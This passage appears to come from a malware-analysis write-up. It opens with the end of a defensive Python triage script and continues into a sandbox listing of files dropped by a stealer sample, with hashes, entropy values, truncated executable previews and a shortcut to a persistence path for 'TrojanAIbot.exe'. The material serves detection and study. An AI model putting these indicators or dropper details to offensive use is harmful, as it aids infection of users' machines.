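        if targets and re.search(r"\btimeout\b", preview, re.IGNORECASE):
            flags.append("delayed delete: waits for the writer to exit first")
    return flags


def run(text: str = SAMPLE_RECORDS) -> dict[str, list[str]]:
    """Map '<writer>#<size>' to its triage flags for every record in the dump."""
    return {f"{PureWindowsPath(r['Process']).name}#{r.get('Size (bytes)', '?')}": triage(r)
            for r in parse_records(text)}


if __name__ == "__main__":
    for name, flags in run().items():
        print(name, "->", flags or ["nothing notable"])
```

Feed it the report's own text (copy the records as they appear) or any local file through shannon_entropy to reproduce the Entropy (8bit) column. Note that the 2.6 MB "data" file in the sample scores 7.76 bits/byte even though the report marks it Encrypted:false; that field is a sandbox heuristic, and a dense non-PE blob dropped next to a stealer is still the stage worth unpacking next.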

Process:C:\Users\user\Desktop\AENiBH7X1q.exe
File Type:data
Category:dropped
Size (bytes):2598912
Entropy (8bit):7.759549710225937
Encrypted:false
SSDEEP:49152:tN91yFyaAOd+floCaJNjz2XbC68KthjXOhOxZUQsrQx+wkAvq3Yfcxl+:tN91yFzuoCQNG2jK5ioZqS+2Sl+
MD5:743F5DD096D5FC69A30E0D9A7BD6C0B5
SHA1:2550886978322E9A57B7C011587025BD1345BAE5
SHA-256:6AE8CAD15C24109F0EDA03A541DBF09012C9213E658900F459F98F75093F29D0
SHA-512:B2674A370F9BB0815121D2E2B8A8D907E50C787A92F1A50ECFE419649E37C9610AB45FA800A9BE0BACC980F93CC256D7832CA4119D3EC359648664E8C2A9C0F6
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{c.YG2QNIETY..7I.99YD2QN.ETYQ77I699YD2QNMETYQ77I699YD2QNMETY.77I8&.WD.X.l.U...c!_J.)6]6<,(t:0YY&B.[<d@$ m,:y.xdi[V]<j?\DiETYQ77If|9Y.3UNMETYQ77I699Y.2^MFDRYQ?7I6.'YD2QN8QTYQ'7I6.'YD2.NMUTYQ57I299YD2QNIETYQ77I6..YD6QN..sYS77I69)YD"QNMEDYQ'7I699YT2QNMETYQ77I..'Y.2QNM.JY.57I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QN..JY.77I699YD2QNMETYQ77I699YD2QNc11!%77I>?9YD"QNMMTYQ37I699YD2QNMETYq77).K]80SQN..JYQ.7I6.'YD>QNMETYQ77I699Y.2Q.c''*Q77I299YD.ONMETYQ77I699YD2QNMETY.77..KJ+'2QNM.\YQ.)I6.1YD.ONMETYQ77I699Y.2Q.METYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QN

Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):231936
Entropy (8bit):5.039764014369673
Encrypted:false
SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:50D015016F20DA0905FD5B37D7834823
SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 5 15:02:52 2024, mtime=Tue Nov 5 15:02:52 2024, atime=Tue Nov 5 15:02:50 2024, length=231936, window=
Category:dropped
Size (bytes):1794
Entropy (8bit):3.5040556851802305
Encrypted:false
SSDEEP:24:8YsrHfV88Rw7TZKuuaqL6p5UAis4FSnplwO4ZTql6nzA9Um:8YWHnRwfuaq6p9D4+plwZTql6s9U
MD5:26CC4AC00C48306D3FE4A822278DDF86
SHA1:D23CB43A5378C248111CC4EAB081C5A6CDEF6A89
SHA-256:4DC806C9309B5D4206DD44D858AB473F158BD2002D0012E9549FFD0783193D05
SHA-512:D99957524509E399D1861969632FB52F0CA4178DCA078149E92E477DF6370E7F1280F9CAAADD95677248BE418D8177EA001E8EDF2D4BCE425766859EAB413D05
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ....T.+./..O..+./...x)*./............................:..DG..Yr?.D..U..k0.&...&...... M........!./..O..+./......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSleYU.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....eYY...Roaming.@......DWSleYY.....C.........................R.o.a.m.i.n.g.....T.1.....eY[...ACCApi..>......eY[.eY[.....*.....................VX..A.C.C.A.p.i.....l.2.....eYZ. .TROJAN~1.EXE..P......eY[.eY[.....?.........................T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d............A.......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

Process:C:\Windows\SysWOW64\svchost.exe
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.985513759796738
Encrypted:false
SSDEEP:192:rh3OhTJHDcwlN2BigBLl8LIBrapNDFpGC1izNAKhgUxn3H2U56vU:rhGTJzlrgBLKLMro1oaKPX/6vU
MD5:8CEBF1709109FBB18B8352D3F2BE4279
SHA1:455BC357937B86B6698C635DD39378493B09CCF2
SHA-256:8AC44C2DE3979D8C9DC08A0375F46686D3F0410354140840C7427A5C1911FC9E
SHA-512:AE568D9BF6116D0A4A6AB181793691A0490C1324195D0F6E4B9B8DEE85316E720ED7F0CC6A9CEE84AC585CB7E88E17F41CDAC61A1A5C3D68B127747DD92A17BE
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:H.!.[zDa.O.B...7.!3.:8.A...9........?,=.`.......L.;m7Pn....=\.n....Yk]...'..D..<.{.#..vr.![8...]5... &...V.x)9.{k..L.H....a.......r..<..H\....w....+\C.B.W. Q%.1..u}5y}..O:.X.....0.e...sd.".$9.ro.....M.g?K.s.F`B2..r.a>HdW.a;...rh.e.-..-;..:"...E..U<....Nw.*...E..a.U.m.I..0....x.I.....v..LY2@....=....S.....6Cn...X^...Ce.g.jLeL.$j..hK.,..G..U....t.+WE.F.A.Z,.2.pZ....W-.AQ....S..R..9H.W...!V.......t]...]...,n.%K.I....I..?.c...._.GH.Ci...=.....fj.`i..)....."y{.y.5u..;.....a......b......f......D..Y.`5..f/.4....c....iR..y}...F.].....5...<.x%............c..y...f..j.^u.a.m2.Z......M.........:.P|.-.o..<...@..8$h.q.A.O...{.-.........W..At.m......m&#.7..>?Q.4.....bjNX.....o....D..4.b...L..FM6....L.@.'....Y..M.=".k.YO.1..:...CR...|......(..p.b......*^.]..:O....x;..............C.oI...#..:....y..K..(.L...L.l.JN...3(d.P.d.....h....M.Cn@....d`s...,..Rf@.R.j..z....a.0{....O.C.n.E.!../h.[.,..7.@....u...W....g.k].\.r.."o.R.uU.._+E&..g.!.DZ.NNa...B..|vw.......

Process:C:\Windows\System32\msdtc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):2313
Entropy (8bit):5.1313124021457375
Encrypted:false
SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786x:Z070s0Y0q0mF7Dm5K
MD5:6D36DDC9D4FF1E6F27826A2E33D8ECE3
SHA1:78A0A40F26E188BADF90FAB4928B734F212502C9
SHA-256:5961D8A95179EE722C79C4DF784115BD560BD8DCB089BC7CEA50D6DAE0F70787
SHA-512:101D013957AA1FD9E91EE4319EF9A5BA5007649D2C1A2D625FD689F2FA1B5B0F2057E17B94429EA0E612E115B85D19267DA1274F47DDBB2DE280D50A44B57F41
Malicious:false
Reputation:unknown
Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

Process:C:\Windows\System32\wbengine.exe
File Type:data
Category:dropped
Size (bytes):40960
Entropy (8bit):0.9455999284510301
Encrypted:false
SSDEEP:48:zz+/EEaTmJxT+5PDqnP2FPREutA/gsPrPGPTPftzsmmzs6QzspAF1saR8qkVWGG:O/EEJ9+5foutARAFCIL
MD5:F47168F48B98570B5C4BA8E37AAC9D04
SHA1:2B394A755FD6F47C343128436D9B449B42ADE98C
SHA-256:016AC24EBEAE7A0C38904580AA10E10159A1B2236398F986D7443B782BF22280
SHA-512:A83A6F68EA7099016CECD4809BCAA4E07B7CCD049D9198F7D6024022656755345469F13F58425E473801D5707B82CA08461339B9F5D761514CC9188649AFADBB
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1150976
Entropy (8bit):5.038914273630659
Encrypted:false
SSDEEP:12288:NwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NwsqjnhMgeiCl7G0nehbGZpbD
MD5:5A2927C6AC02ED9AAA0EEAD979B6927B
SHA1:1643B752C9CB197A45F79CF874491B60C0C462C0
SHA-256:A07AAF891E3ACBE20E6A175BD505C94320F28D7324495954D441F9B2C1AFECDD
SHA-512:B3DD005C4045CA52E910DFC382123AEAF6814CBE68FA865AD2643714677877F036C69F0682BFE8D6171EB641C530CA1832DD1168E0E64E4813F47EBF6BF8285A
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1801216
Entropy (8bit):6.974315137464885
Encrypted:false
SSDEEP:49152:kwVFr68Vw9wn/6h8N1zid1Dmg27RnWGj:kwVFrssC/d1D527BWG
MD5:9543A0B25A6C0199CB8A7CB3D1E158F8
SHA1:720CB4EBCCC85E964639B9CE175FA976D226E4A1
SHA-256:26EEE7777EF60A7F140E8644E5DCA58FE4EBD9B8F59294078262F14950963917
SHA-512:D56B782BA67DC55E2C1CC958E4E5C91708B11D142883F0A7504D0966EDFE3A309ADBAE73170B123AB6A84A36CDD49C65F4D16F773E3256E5DCBBEF3C99ED5D58
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1348608
Entropy (8bit):7.25374917200631
Encrypted:false
SSDEEP:24576:GQW4qoNUgslKNX0Ip0MgHCpoMBOuYsqjnhMgeiCl7G0nehbGZpbD:GQW9BKNX0IPgiKMBOuEDmg27RnWGj
MD5:C44491674DD9A23CD4DB0BCF383E02D9
SHA1:FC7943DAA7E68592402C39E091F14219CC40EC36
SHA-256:E140956BE9C7056E9D96331575A84255C8AF4E8227E47FB6F4B97421105F0767
SHA-512:3D36B6AFA1BACB991A6B1E49FA25D9AE3582A652D7BF5EAB601C5CB79DAE4872167D1C42DE0DB2E580CA3DF8974B684622FBEC27D3339978607D67609CFB228C
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1224192
Entropy (8bit):5.163565763264593
Encrypted:false
SSDEEP:24576:i2G7AbHjkHsqjnhMgeiCl7G0nehbGZpbD:i2G7AbHjGDmg27RnWGj
MD5:680F1351195518F3B0D09606B045D041
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:05E9A8DF5B04EAD8CA2BDD472820AD2DD1315923
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2FC76537662A0D86B7218DF7F7709C864516085478453617964FD03FECA216A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D87D18A58421DFCC777F618822CC1FB9D057862BC8A068B2E5B213E11D78EA91257F725D545B22F49382963675BB22E2A01689C000C1C936855F857A4BA92277
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................s..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.288944686032053
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:OkdpSI+K3S/GWei+qNv2uG3/sqjnhMgeiCl7G0nehbGZpbD:O6SIGGWei2uG3jDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7FF4977D46F3519BDDBBC7F980695D96
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8D65C09D36FEF3D7C62815F2A59168DDFC6A7097
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0DEFB3B7C8340FE786009B64C5977673A58EC0E06F2D0301E742F377A629558F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A29911E2E37A8F4E9D0BDF6CFBA0A6315480D03A0B7833E757D90CDF54B1BFD6EFF89291B4AF5135DB87D4FC70E557EF9766F0082C905413F5875134426658D7
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......x..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1141248
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.017519261901143
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:58Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:58sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9A657A7F089C2AF389D25AD39498587D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC61291C6F4CF08EE620D7331F69366AD0897FBC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:89A50CD265906BF61F8363C2822AEAA03118B5A16B2FB52D5F458F95266AC2DA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1727BB908171E8896939D6E1BA3A6F6E9B9FFA18454CAEBCDACF4305814B6930C6C61F51A70FD0068ABF0EF98510CCEE50F023FFA8B66F9609BD4FF280617F71
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3220327919279378
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:5xacl8ta/k/uMclF6vMclFq5zzT1p/z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GAE:ecl80kqF69Fq5zzR66CzE5Z2+fqjFpcn
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:129C9AA39107A756F033B14CD78B0D9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BE2B37B08A7FFEDAC9E45C3DB053FA82508ACBD7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:55B22BEDE57A44B9A60C820D2A965461C931AC044B54F50CB419C62CC049DBC0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E47763BD6F889BFF98B8007FC91C173044894B453A2D72239266415EE5CF43EF25673997E24A5300EE95A8BBA24992A9497E0E0EB8F5B27AC0B2032864FBAAE9
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.@..X...X.......................................X...!...........................t...T...["...............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............b././..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.t...T...["..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.222908872047872
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
SSDEEP:12288:aObHA4LWOsvAYFTXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:LjL3UTXsqjnhMgeiCl7G0nehbGZpbD
MD5:E3FDD9F1AB11BF5FA018CD72E8AF127F
SHA1:669EA5E3FE9060586BC4C5667219F5560AA39D79
SHA-256:CB85E85398EC4C58536A6A000014ECFE39A6481AB649E4B854254EA7E61E898D
SHA-512:85E736605AF5773DBE7103D1079FFDD513C269BB1298287D1C4956D1EBFD86DF9EC06027CAD683FED597B290CFBD1AAAD32A9CBE034878E7DAFA81B511745147
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1235968
Entropy (8bit):5.182202025576679
Encrypted:false
SSDEEP:12288:QpFtQOjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jOjsqjnhMgeiCl7G0nehbGZpbD
MD5:A1956F0F6BD74F7EF4C9CB4215174395
SHA1:905BEE1B5BB4018F3067148BE70C2D802114A9D4
SHA-256:EF2B411DB96A640B889258A83D3C613EA7D9BF61BA3C3EA7D0CF3CCF772607DD
SHA-512:F99414E61456D855CA702F1DE94274C5D975635EA7E817F65C474EC05B4F51AE669A13047B9E49762A86AF4FAEEDF8BCA3E30004B8FA3BA977BDFBD93D31766D
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):7.102372136691769
Encrypted:false
SSDEEP:24576:l3frCoQItLsiLPLe24CxruW4bIhllXsqjnhMgeiCl7G0nehbGZpbD:l3fzsIPLkCNuVbIhDrDmg27RnWGj
MD5:FE74DE3CB21B1302D776ED38CBE51157
SHA1:0BBB802156925DF99835E39FF55B6A7089AFA742
SHA-256:A94691CFCDE4229BE53571C021A0669FD7D6EE56023542CD8CC6F0080BE9DD72
SHA-512:AD82C9EE4552FE47A8203750013CF3468F5B9CDE2CAE51ABA2B66868B1B64276DEADEDA9DCBFD915BA2A618DA69DC1057307A18050EB641DF433D9BAD94F9FBA
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1846784
Entropy (8bit):6.939441871408274
Encrypted:false
SSDEEP:24576:wW6BApg2YuyuNDYTabvcRvNYf8km1SsqjnhMgeiCl7G0nehbGZpbD:wF2YuHNETovcvNYf8kmcDmg27RnWGj
MD5:49C1710C0BFB918B23DDE91B5109B005
SHA1:C4231CB32518B15EC9EB2F1260B167DB0B6475DB
SHA-256:F28CC7097B41B55243759823A64666A59DE69D28418BF274E77C0E2C384A6E6D
SHA-512:AAA930AB433D6962C64A23B332F00C647D0866516893F22E353DDAEAFC6B8F012FA9BB0BFB88A23204A2182FD8EA1D0C1FC31F0B278CD3059191A64D5D194E67
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):7.23887290593797
Encrypted:false
SSDEEP:24576:YiW6ZvAKF5i/dN9Bdexj9Trk+FjsqjnhMgeiCl7G0nehbGZpbD:YYxF50b9Bdm9Tx9Dmg27RnWGj
MD5:5C7A9FB953BDB52056F816EFDBDB2113
SHA1:35AF1353C7D1FE23FE9DE07421EEC9A1D38F5DC1
SHA-256:0ED59CD2CCEB31EB0DDF9A29B96805798AF6C1059B261AF9FB3D0ACAF9F28DFF
SHA-512:E06ABE7EB7D954AF448573FBCEDF5B85B4536CB41C3D8C0217DA9D484553FABD325113ECEC506E9D665D7C843CB8F91D3597A19DAEF57B4BA3BF2C1103E861D0
Malicious:true
Reputation:unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1455616
Entropy (8bit): 5.47659287090325
Encrypted: false
SSDEEP: 24576:MJnJ5D3WYOsqjnhMgeiCl7G0nehbGZpbD:MJnJ5DGYiDmg27RnWGj
MD5: 34A80D2A50958A3B610C920E02938885
SHA1: F26D43BB06A903C432786693480C2BEFDB285E0C
SHA-256: B0C642869C39DE1B65ED50030A0BA80DEFA3389B1079540BE71AF0EDA7AE0805
SHA-512: 37C8D5A36A4443FA00979BB181ECD9A092E319DFAE08C8FE7555EBEBD2C6B1242C9B6D1DD5748DEC0BD738DA3A0EB43E117F6CF01E70716F9BA78FB0B01B3CDE
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.......................................... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2075136
Entropy (8bit): 6.736567241660819
Encrypted: false
SSDEEP: 49152:ZPK86JYTerDjfJ2313e1mP1MdnUZDmg27RnWGj:bD527BWG
MD5: 5A1E00A57581E13BC2A44A504261CCFF
SHA1: BBFE5170EC54B94959676DD457C8EADD7D8AF13F
SHA-256: 4FC2D7CE81F8B9CAC18F7CE472DC75B5EACA8F82E2BC944B3EF7956E64D9EE8B
SHA-512: 51B6FD36588BC9BB99942C4A00DB945C9B58C5A878D706F22F4BE4600C9BC2AEC3FAF86DF4A89B1B98840F0AAFD8EFC25B4B991E90D4AE1A10CCA357C58C503A
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ......^ ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1225728
Entropy (8bit): 5.1633170301696785
Encrypted: false
SSDEEP: 12288:7EP3R6KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:A6KsqjnhMgeiCl7G0nehbGZpbD
MD5: 35184A2F5B6B06D8E814BA39A601EA5C
SHA1: 616A2EAED4BEC88DB058DB6BF1552E7AD010F804
SHA-256: 307FBCA352E1C14D93C21D755C1F4AD13AED9B157E768B89653730C5E4EEF253
SHA-512: 267FDCCAD4231B6F158D9D5EE53B5C00A9F7E8B50C0648B65DAA5A12BB66B5FB942EAA943CB36A363BD39326122AF3AB3377EE1AEFD94B8EB6E4A7829E8E4DAD
Malicious: true
Reputation: unknown
